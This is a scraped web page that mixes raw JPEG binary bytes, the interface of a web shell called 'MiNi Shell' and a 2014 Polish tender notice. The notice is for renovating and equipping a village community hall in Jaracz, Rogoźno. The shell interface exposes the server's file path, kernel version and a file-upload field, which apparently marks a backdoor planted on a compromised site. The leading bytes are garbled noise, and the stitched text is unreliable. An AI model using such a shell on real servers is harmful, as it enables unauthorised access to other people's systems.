JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140324/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140324/61725-N-2014.html

<p class="kh_header"><b>Rogoźno: Remont świetlicy wiejskiej w miejscowości Jaracz wraz z wyposażeniem i zagospodarowaniem otoczenia</b><br>
<b>Numer ogłoszenia: 61725 - 2014; data zamieszczenia: 24.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogoźno , ul. Nowa 2, 64-610 Rogoźno, woj. wielkopolskie, tel. 67 26 84 400, faks 67 26 18 075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rogozno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlicy wiejskiej w miejscowości Jaracz wraz z wyposażeniem i zagospodarowaniem otoczenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia: 
Roboty rozbiórkowe:
Rozbiórka pieców licowanych kaflami o objętości 1,682 m3
Rozebranie podłóg drewnianych o powierzchni 64,60 m2
Rozebranie legarów o długości 61,20 m
Rozebranie posadzek o powierzchni 11,20 m2
Transport gruzu o objętości 1,42 m3 na Gminne wysypisko odpadów w miejscowości Studzieniec.
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.
	
Roboty remontowe:
Wykucie otworów w ścianach o powierzchni 1,688 m2
Przebicie otworów w ścianach ceglanych 2 sztuki
Wykonanie przesklepień otworów w ścianach wraz z wykuciem wnęk pod belki 0,455 m3
Ułożenie nadproży prefabrykowanych o wysokości 110 mm o łącznej długości 17,10 m
Wykucie z muru ościeżnic drzwiowych 5 szt.
Zamurowanie otworów w ścianach bloczkami z betonu komórkowego o objętości 0,986 m3
Wykonanie ściany o grubości 45 cm i wysokości do 4,5 m wraz z wypełnieniem szczeliny styropianem FS 15 gr. 10 cm o łącznej powierzchni 3,885 m2
Licowanie ścian cegłą klinkierową o powierzchni 3,165 m2
Wykonanie ścianek działowych z płytek z gazobetonu gr. 12 cm o powierzchni 4,205 m2
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Podłoża i posadzki
Podkłady betonowe na podłożu gruntowym C8/10 o objętości 6,46 m3
Posadzki cementowe zatarte na ostro o grubości 60 mm wraz z uzbrojeniem siatką, ułożeniem folii 0,2 mm oraz izolacją styropianem FS 20 gr. 10 cm 64,60 m2
Wykonanie warstw wyrównawczych z zaprawy samopoziomującej gr. 10 mm o powierzchni 11,20 m2
Wykonanie posadzek z płytek typu gress o wymiarach 30x30 cm kolor oraz faktura do uzgodnienia z Zamawiającym o powierzchni 75,70 m2
Wykonanie cokolików z płytek wysokości 10 cm wkładanych na klej o długości 42,10 m, kolor i faktura do uzgodnienia z Zamawiającym.
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Tynki, okładziny, malowanie
Odbicie tynków zewnętrznych o łącznej powierzchni 32,90 m2
Wykonanie tynków wewnętrznych kat. III o powierzchni 45,40 m2
Wzmocnienie ścian nieotynkowanych siatką na zaprawie klejowej o powierzchni 1 m2
Zeskrobanie i zmycie starej farby o powierzchni 157,426 m2
Szpachlowanie ścian wewnętrznych o powierzchni 124,30 m2
Licowanie ścian płytkami glazurowymi na klej o powierzchni 52,715 m2
Gruntowanie podłoży o powierzchni 175,43 m2
Wykonanie tynków żywicznych (kolor do uzgodnienia z Zamawiającym) o grubości 1,5 mm o łącznej powierzchni 31,048 m2
Wykonanie i montaż desek odbojowych drewnianych lakierowanych szerokości 25 cm i grubości deski 19 mm o łącznej długości 46,80 m
Malowanie farbami emulsyjnymi powierzchni wewnętrznych o powierzchni ścian 116,40 m2 oraz sufitów o powierzchni 17,90 m2
Wykonanie okładzin stropów płytami GK wodoodpornej na ruszcie z metalowych kształtowników CD i UD o powierzchni 17,90 m2
Wykonanie stropu podwieszonego na metalowym ruszcie z kształtowników CD i UD o powierzchni 57,80 m2
Obsadzenie kratek wentylacyjnych podokiennych nawiewnych o wymiarach 60x204 dwustronnych 3 szt.
Montaż wentylacji wywiewnej wykonanej z rury dwupłaszczowej z blachy nierdzewnej średnicy 150 mm długości 2,5 m, 3 sztuki.
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Stolarka otworowa
Montaż drzwi jednoskrzydłowych wewnątrz lokalowych kompletnych o ościeżnicy metalowej 4 sztuki wraz z odbojami, drzwi do wc z nawiewem o powierzchni 8,20 m2
Montaż drzwi wejściowych metalowych z ociepleniem z dwoma zamkami patentowymi z naświetleniem typu FIX szyba bezpieczna P-2 o wymiarach 1x2,05m
Demontaż i montaż okien uchylno-rozwiernych z łukiem o wysokości 16 cm, okna z PCV o współczynniku U nie gorszym niż 1,1 W/(m2*K) o powierzchni 18,61 m2, montaż w istniejących otworach z zachowaniem parapetów zewnętrznych, górna część okna z zachowaniem szprosów podziałowych
Montaż parapetów wewnętrznych z PVC o łącznej długości 9 m
Osadzenie okien w połaci dachowej wraz z obróbką o wymiarach 78x58
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Dach
Rozbiórka pokrycia dachowego z dachówki karpiówki podwójnej o powierzchni 130,20 m2
Rozebranie elementów więźby dachowej łaty dachowe w odstępie 16 cm o powierzchni 130,20 m2
Rozebranie obróbek murów ogniowych, okapów itp. o powierzchni 12,40 m2
Pokrycie dachu folią zabezpieczającą o powierzchni 130,20 m2
Ołacenie połaci dachowych z kontrłatami, łaty 38x50 w rozstawie 16-24 cm z tarcicy nasyconej dla powierzchni dachu 130,20 m2
Pokrycie dachu dachówką karpiówką ceramiczną w kolorze czerwieni ceramicznej układanej w koronkę z gąsiorami o powierzchni 130,20 m2
Wymiana podbitki boazeryjnej z listew drewnianych szerokości 12 cm z impregnacją w kolorze o powierzchni 16,15 m2
Wykonanie wiatrownic z tarcicy nasyconej, deska szczytowa strugana o przekroju poprzecznym drewna 180 cm2 o łącznej objętości drewna 0,465 m3
Wykonanie zabezpieczenia dachu przed zaciekaniem.
Osadzenie ławy kominiarskiej
Należy przeprowadzić uzupełnienie uszkodzonego pokrycia dachowego wykonanego z dachówki ceramicznej karpiówki podwójnej ułożonej w koronkę o łącznej powierzchni 95,70 m2
Rozebranie kominów wolnostojących o objętości 0,829 m3
Wykonanie kominów wieloprzewodowych z cegły klinkierowej kl. 35 o objętości 0,829 m3
Montaż rynien dachowych z blachy o łącznej długości 24,40 m i średnicy 15 cm
Montaż rur spustowych o średnicy 12,5 cm i łącznej długości 18,40 m
Wykonanie obróbek blacharskich o łącznej powierzchni 9,60 m2
Należy wykonać montaż daszków wejściowych systemowych o wymiarach 1,8 x 1,2 m i wysokości łuku 26 cm 1 sztuka
Uzupełnienie pokrycia z dachówki ceramicznej karpiówki układanej podwójnie w koronkę o powierzchni 340,89 m2
Rozebranie obróbek murów ogniowych o powierzchni 14,10 m2
Wymiana podbitki boazeryjnej z listew drewnianych szerokości 12 cm z impregnacją w kolorze o powierzchni 31,955 m2
Wiatrownice z drewna z tarcicy nasyconej o objętości 0,465 m3
Osadzenie ławy kominiarskiej
Rozebranie kominów wolnostojących o objętości 0,879 m3
Wykonanie kominów wieloprzewodowych wolnostojących z cegły klinkierowej kl 35 o objętości 0,879 m3
Rynny dachowe o średnicy 15 cm z blachy o długości 30,5 m
Rury spustowe o średnicy 12,5 cm z blachy o długości 13,8 m
Obróbki blacharskie z blachy ocynkowanej o powierzchni 13,20 m2
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Schody zewnętrzne
W ramach tego zadania należy przeprowadzić rozbiórkę elementów betonowych o łącznej objętości 0,42 m3
Wykopy liniowe fundamentowe o objętości 1,575 m3
Należy wykonać zewnętrzne schody betonowe zbrojone wraz z podestem i dwoma biegami po trzy stopnie w biegu o szerokości 1,40 m o łącznej objętości 1,560 m3
Licowanie schodów cegłą klinkierową o łącznej powierzchni 1,710 m2
Wykonanie okładzin schodów z płytek typu gress antypoślizgowych mrozoodpornych o łącznej powierzchni 3,388 m2
Wykonanie wycieraczki do obuwia na podeście schodów ocynkowanych z dnem wraz z odprowadzeniem wody o powierzchni 40x60 cm
Wykonanie balustrady schodowej prostej z pochwytem stalowym malowanym proszkowo obejmującej dwa biegi oraz podest o długości 4,5 m
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Roboty zewnętrzne
Rozbiórka elementów betonowych o powierzchni 0,42 m3
Wykonanie korytowania o głębokości 30 cm i powierzchni 267,12 m2
Wykonanie obrzeży betonowych o wymiarach 30x8 cm na podsypce piaskowej o łącznej długości 70 m
Wykonanie warstwy odcinającej z zagęszczeniem o grubości 10 cm o powierzchni 267,12 m2
Wykonanie podbudowy betonowej o grubości 12 cm z betonu klasy B10 o powierzchni 207,12 m2
Wykonanie nawierzchni z kostki betonowej grubości 8 cm na podsypce cementowo-piaskowej o powierzchni 207,12 m2
Wykonanie nawierzchni z kostki betonowej grubości 6 cm na podsypce cementowo-piaskowej o powierzchni 60 m2 wraz z montażem wycieraczki stalowej na wejściu
Wykonanie wrót z furtką o wysokości 1,6 m i szerokości wrót 3 m i furtki 1 m w ramach stalowych na słupkach bez pasa dolnego. 
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Elewacja
Wykonanie uzupełnienia i naprawy tynku zewnętrznego kat. III o powierzchni 31,20 m2 oraz 27 m2
Przygotowanie podłoża pod malowanie o powierzchni 187,055 m2 oraz 219,126 m2
Uzupełnienie ubytków w spoinach ściany z cegieł o powierzchni 63,58 m2 oraz 68,34 m2
Gruntowanie podłoża pod malowanie o powierzchni 123,475 m2 oraz 150,786 m2
Malowanie elewacji farbami fasadowymi w kolorze pastelowym o powierzchni 123,475 m2 oraz 150,786 m2

Zamówienie obejmuje również wykonanie instalacji wodno-kanalizacyjnej oraz klimatyzacji według załączonej dokumentacji technicznej.
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Zamówienie obejmuje również wykonanie instalacji elektrycznej według załączonej dokumentacji technicznej
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Wszystkie elementy związane z realizacja przedmiotu zamówienia zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.
Podstawą oszacowania wartości zamówienia jest dokumentacja projektowa stanowiąca załącznik do niniejszej SIWZ, załączony przedmiar jest tylko załącznikiem pomocniczym. 

W ramach zadania Wykonawca zobowiązany jest do zakupu, dostawy oraz montażu elementów stanowiących wyposażenie zaplecza kuchennego oraz sali świetlicy zgodnie z załącznikiem nr 8 i 9 do SIWZ z uwzględnieniem minimalnych parametrów dla podanego wyposażenia.
Na wyposażenie składają się następujące elementy:
Zmywarka wolnostojąca, Szafa chłodnicza dwudrzwiowa, okap gastronomiczny, szafki kuchenne 8 szt., blat ze stali nierdzewnej 2 szt., kuchenka mikrofalowa, regał ze stali nierdzewnej, stoły drewniane 7 szt., krzesła drewniane 60 szt., zestaw nagłaśniający, telewizor wraz z anteną do odbioru cyfrowej telewizji naziemnej oraz kablem antenowym i uchwytem do anteny, laptop, projektor, szafka pod telewizor zabudowana w ścianie.

Wykonawca zobowiązany jest również do zakupu, dostawy oraz montażu elementów boiska do siatkówki, w skład, których wchodzą następujące elementy:
Słupki do siatkówki o profilu kwadratowym o min. przekroju 80x80 mm wraz elementami służącymi do naciągu siatki, tuleje montażowe do słupków wmontowane w podłoże ocynkowane ogniowo, dekle maskujące tuleje montażowe, siatka o wymiarach 9,5 x 1,0 m wraz ze sznurkami naciągowymi z naciągiem z polipropylenu oraz elementów boiska do koszykówki w skład, których wchodzą kosz do koszykówki ze stojakiem 2 szt. o wysokości regulowanej od 2,1 do 3,05, tablicy o wymiarach 110x70 z tworzywa sztucznego, średnica obręczy 45 cm, wymiar podstawy 106x76 cm, objętość pojemnika balastowego 110 litrów 2 sztuki.

Dostawa i montaż ławostołu z zadaszeniem wykonanego z drewna litego sosnowego impregnowanego wymiary ławki i stołu długość 180 cm, szerokość siedziska 33 cm, szerokość stołu 70 cm, wysokość stołu 77 cm. Zadaszenie o wymiarach 216x270 cm. Podane wymiary określają minimalne parametry.

Zamówienie przewiduje również zagospodarowanie terenu zieleni w pobliżu budynku świetlicy wiejskiej i przewiduje między innymi sadzenie 41 szt. drzew/krzewów oraz wykonanie trawników dywanowych siewem na gruncie kategorii III z nawożeniem o powierzchni 120 m2.

UWAGA!!!
W związku z faktem, iż cena ofertowa ma charakter ryczałtowy, przed złożeniem oferty Zamawiający informuje o możliwości przeprowadzenia wizji lokalnej terenu budowy i jego otoczenia, po ustaleniu z Zamawiającym dogodnych terminów. Koszty dokonania wizji lokalnej terenu budowy ponosi Wykonawca.

Operacja współfinansowana jest ze środków Unii Europejskiej w ramach działania 413 Wdrażanie lokalnych strategii rozwoju objętego PROW na lata 2007-2013 dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.11.12.91-4, 45.11.13.00-1, 45.21.23.00-9, 45.31.00.00-3, 45.32.40.00-4, 45.33.00.00-9, 45.33.10.00-6, 45.33.20.00-3, 45.40.00.00-1, 45.42.10.00-4, 45.43.00.00-0, 45.43.10.00-7, 45.44.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy zł.00/100) w formach przewidzianych w ustawie z dni 29 stycznia 2004 r. Prawo Zamówień Publicznych art. 45.
Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Gminy Rogoźno, ul. Nowa 2,64-610 Rogoźno  

Bank: BS Czarnków, o/Rogoźno,
Nr konta 56 8951 0009 3900 0114 2000 0020</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust. 1 pkt.2 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, dat i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, informacje te zostaną przygotowane na podstawie załącznika nr 4 do SIWZ, Zamawiający warunek uzna się za spełniony jeśli Wykonawca wykaże iż w ostatnich 5 latach wykonał 3 tożsame prace o wartości minimalnej 150 000,00 zł każda,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty wykaz sprzętu technicznego i narzędzi niezbędnych do wykonania zamówienia, którymi dysponuje/będzie dysponował Wykonawca - wg. załącznika nr 5 do SIWZ.  Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje /będzie dysponować następującym sprzętem:
- min. 1 samochód dostawczy o masie do 3,5 tony,
	- min. 1 szt. betoniarki elektrycznej o poj. min. 150 litrów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty wykazu osób, którymi Wykonawca zamierza wykonać przedmiot zamówienia zgodnie z załącznikiem nr 6 do SIWZ, zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje / będzie dysponował co najmniej 1 osobą kierującą robotami w każdej branży tj. ogólnobudowlanej, instalacyjnej i elektrycznej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.rogozno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Rogoźnie
ul. Nowa 2
64-610 Rogoźno
pok. nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2014 godzina 09:45, miejsce: Urząd Miejski w Rogoźnie
ul. Nowa 2
64-610 Rogoźno
pok. nr 15 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Operacja współfinansowana jest ze środków Unii Europejskiej w ramach działania 413 Wdrażanie lokalnych strategii rozwoju objętego PROW na lata 2007-2013 dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi..</p>
